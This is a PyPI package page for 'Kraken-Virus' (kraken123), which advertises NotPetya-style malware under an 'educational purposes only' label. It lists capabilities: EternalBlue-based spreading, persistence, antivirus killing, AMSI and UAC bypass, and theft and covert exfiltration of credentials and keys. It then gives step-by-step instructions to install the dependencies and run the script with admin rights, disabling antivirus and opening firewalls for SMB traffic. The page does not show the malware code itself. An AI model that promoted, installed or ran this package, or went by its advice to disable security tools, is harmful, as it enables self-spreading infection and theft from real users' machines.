A virus package FOR EDUCATIONAL PURPOSES ONLY
Project description
Kraken-Virus
A sophisticated malware research suite inspired by NotPetya, engineered with enhanced capabilities and superior operational effectiveness for advanced cybersecurity analysis and academic study.
Key Features
🔷 Exploitation & Propagation
- EternalBlue Exploit (MS17-010): Full implementation of the SMB vulnerability for lateral movement and network-based propagation.
- Multi-Vector Propagation: Automated spreading mechanisms across networks, removable USB drives, and email communication systems.
🔷 Persistence & Stealth
- Advanced Persistence Mechanisms: Registry modifications, service installations, scheduled tasks, and boot sector manipulation for sustained execution.
- Polymorphic Engine: Code that alters its own signature to evade static detection methods.
- Anti-Detection Techniques: Environmental awareness, sandbox evasion, and debugging resistance.
🔷 Data Collection & Exfiltration
- Sensitive Data Harvesting: Comprehensive collection of credentials, documents, browser history, and cryptographic keys.
- Stealthy Exfiltration: Encrypted data transmission using multiple protocols and covert channels.
🔷 Defense Evasion
- Security Tool Disabling: Identification and termination of antivirus processes, intrusion detection systems, and security services.
- Bypass Techniques: UAC bypass, AMSI patching, and trust mechanism exploitation.
🔷 TO EXECUTE:
Run a Virtual Machine and disconnect from network or wifi (Mandatory)
you will need to run the code in a Virtual Machine because it can infect your computer by network or wifi
Prerequisites:
-
Python 3.6+ installed on your system.
Download: Python Official Website
⚠️ Ensure you check "Add Python to PATH" during installation. -
Git (optional, for cloning repositories).
Download: Git Official Website
Step-by-Step Guide:
1. Clone or Download the Script:
- If the script is in a Git repository, clone it:
git clone <repository_url> cd <repository_directory>
- If you have the
kraken.pyfile directly, place it in a dedicated folder.
2. Install Dependencies:
Open Command Prompt or PowerShell in the script's directory and run:
pip install impacket cryptography pywin32
impacketfor SMB/NTLM operations.cryptographyfor encryption (Fernet).pywin32for Windows API interactions (win32api, win32security, etc.).
3. Run the Script:
Execute the script with Python:
python kraken.py
⚠️ Notes:
- Antivirus Warnings: Some security tools may flag parts of the script (e.g., use of
pywin32orimpacket). Temporarily disable AV if needed (use at your own risk). - Admin Privileges: The script may require elevated permissions to access Windows registry or system files. Run PowerShell/CMD as Administrator.
- Network Operations: Ensure firewalls allow SMB/HTTP traffic if the script interacts with networks.
🔧 Troubleshooting:
- Module Not Found Error: Reinstall missing modules with
pip install <module_name>. - Python Path Issues: Ensure Python is in your system PATH. Verify with:
python --version - Windows Dependencies: For
pywin32, if errors persist, use the official.exeinstaller: pywin32 releases.
📦 Manual Dependency Installation (if pip fails):
- Impacket:
git clone https://github.com/SecureAuthCorp/impacket.git cd impacket pip install .
- PyWin32:
Download the compatible.whlfile from here, then install via:pip install <downloaded_whl_file>
🚀 Execution:
After dependencies are installed, run:
python kraken.py
Project details
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file kraken123-0.4.0.tar.gz.
File metadata
- Download URL: kraken123-0.4.0.tar.gz
- Upload date:
- Size: 44.6 kB
- Tags: Source
- Uploaded using Trusted Publishing? Yes
- Uploaded via: twine/6.1.0 CPython/3.12.9
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
1038eae2c5f4a13c07b4b7d5dfc37457a8c20a3190b90ed6dffdbdf09b50857b
|
|
| MD5 |
66a0635bfdb2b6ddea17e446f034fd9a
|
|
| BLAKE2b-256 |
8ede4a4b98937a42b9b1fa2af777dfb6c0976a51f919e399439cac1487d6d0d3
|
Provenance
The following attestation bundles were made for kraken123-0.4.0.tar.gz:
Publisher:
python-publish.yml on bluecodeyt12-maker/Kraken-Virus
-
Statement:
-
Statement type:
https://in-toto.io/Statement/v1 -
Predicate type:
https://docs.pypi.org/attestations/publish/v1 -
Subject name:
kraken123-0.4.0.tar.gz -
Subject digest:
1038eae2c5f4a13c07b4b7d5dfc37457a8c20a3190b90ed6dffdbdf09b50857b - Sigstore transparency entry: 448791114
- Sigstore integration time:
-
Permalink:
bluecodeyt12-maker/Kraken-Virus@7cf0b5916b9472be0104e2c80ebee798647b4ef7 -
Branch / Tag:
refs/heads/main - Owner: https://github.com/bluecodeyt12-maker
-
Access:
public
-
Token Issuer:
https://token.actions.githubusercontent.com -
Runner Environment:
github-hosted -
Publication workflow:
python-publish.yml@7cf0b5916b9472be0104e2c80ebee798647b4ef7 -
Trigger Event:
workflow_dispatch
-
Statement type:
File details
Details for the file kraken123-0.4.0-py3-none-any.whl.
File metadata
- Download URL: kraken123-0.4.0-py3-none-any.whl
- Upload date:
- Size: 42.2 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? Yes
- Uploaded via: twine/6.1.0 CPython/3.12.9
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
ec059c5e3fbbdb4c80f4f54595ae94d09af901e62c7044a08019cdd09da82f7e
|
|
| MD5 |
3fbf2b9690c2b10336d321b964d1754b
|
|
| BLAKE2b-256 |
fd95bca6a6bd6b3de216d98d685fa4dc64650285bf1fdf96ff63a9d0159a48c4
|
Provenance
The following attestation bundles were made for kraken123-0.4.0-py3-none-any.whl:
Publisher:
python-publish.yml on bluecodeyt12-maker/Kraken-Virus
-
Statement:
-
Statement type:
https://in-toto.io/Statement/v1 -
Predicate type:
https://docs.pypi.org/attestations/publish/v1 -
Subject name:
kraken123-0.4.0-py3-none-any.whl -
Subject digest:
ec059c5e3fbbdb4c80f4f54595ae94d09af901e62c7044a08019cdd09da82f7e - Sigstore transparency entry: 448791127
- Sigstore integration time:
-
Permalink:
bluecodeyt12-maker/Kraken-Virus@7cf0b5916b9472be0104e2c80ebee798647b4ef7 -
Branch / Tag:
refs/heads/main - Owner: https://github.com/bluecodeyt12-maker
-
Access:
public
-
Token Issuer:
https://token.actions.githubusercontent.com -
Runner Environment:
github-hosted -
Publication workflow:
python-publish.yml@7cf0b5916b9472be0104e2c80ebee798647b4ef7 -
Trigger Event:
workflow_dispatch
-
Statement type: